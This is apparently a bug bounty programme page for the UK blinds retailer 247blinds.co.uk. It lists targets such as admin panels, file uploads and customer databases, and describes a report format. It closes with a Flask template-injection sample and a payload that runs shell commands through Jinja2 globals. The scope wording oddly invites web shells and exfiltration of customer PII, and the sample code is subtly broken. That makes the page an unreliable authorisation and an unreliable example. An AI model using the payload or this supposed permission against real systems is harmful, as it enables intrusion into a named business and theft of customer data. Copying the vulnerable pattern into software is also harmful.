247 Blinds is a UK-based e-commerce platform selling blinds, curtains, shutters, and window coverings at 247blinds.co.uk. The site handles customer accounts, order fulfillment, payment processing, admin dashboards, CMS product management, and file upload workflows for product imagery and made-to-measure specifications — fertile ground for admin access escalation, shell/RCE, XSS-to-file-upload chains, and database extraction if any boundary slips.

In scope materially: every HTTP(S) origin answering for 247blinds.co.uk and delegated subdomains, admin and staff portals, CMS and product management interfaces, customer database and order records, checkout and payment processing flows, file upload endpoints, API integrations with shipping and payment providers, staging or preview environments.
Civil exclusions only: mass harassment, ransomware, laundering.

One flat tier. Multiple criticals from the same researcher are paid independently.

Everything 247 Blinds operates at 247blinds.co.uk and its subdomains.

• Admin and staff backoffice panels — authentication bypass, privilege escalation
• File upload endpoints — unrestricted upload, path traversal, web shell deployment
• XSS vectors — stored, reflected, DOM-based chaining to session theft
• Shell/RCE — command injection, template injection, SSRF-to-RCE
• Customer database — SQL injection, data extraction of PII and order records
• Checkout and payment flows — price manipulation, order tampering
• CMS and product management — content injection, media library abuse
• API endpoints — REST and GraphQL surfaces, authentication flaws, IDOR
• Staging / dev environments — dev-, staging-, test- subdomains

Every endpoint, parameter, and admin interface is eligible when a critical impact is reproducible.

• Every hostname routing through 247 Blinds edge
• Third-party integrations (made-to-measure configurators, payment iframes) when the vulnerability originates from 247 Blinds
• Admin subdomains — admin, dashboard, backoffice

1. Prove exploitation success. Replayable curl flows, Burp/HAR exports, web shell access logs.
2. Articulate kill chain. Number each hop: initial vector → escalation → admin access → data exfiltration.
3. Document blast radius. Quantify users or records affected.
4. Encrypt & ship privately. Sanctioned intake before broadcasting.
5. Duplicate fairness. First fully qualifying chain wins.

Start from the security contact on 247blinds.co.uk.

# Title
[Critical][Exploit-Proven] <tight title>
## Attack chain narrative
1. Preconditions
2. Entry primitive — exact HTTP verb/path/query/body
3. Pivot(s) chaining trust escalation
4. Final hop → admin access / data exfiltration / shell
## Successful exploitation evidence
• Replayable script + truncated responses
• HAR / Burp with unauthorized state change
## Reproduction package
Commands + fixtures + pinned SHAs

Server-Side Template Injection via customer enquiry field — execute arbitrary commands on the server.

# BUGGY: user input rendered through Jinja2 template directly
from flask import Flask, request, render_template_string

app = Flask(__name__)

@app.route('/enquiry', methods=['POST'])
def enquiry():
    name = request.form['name']
    return render_template_string(
        f"<p>Thank you, {{name}}</p>"
    )
# POST /enquiry name={{config.__class__.__init__.__globals__['os'].popen('id').read()}}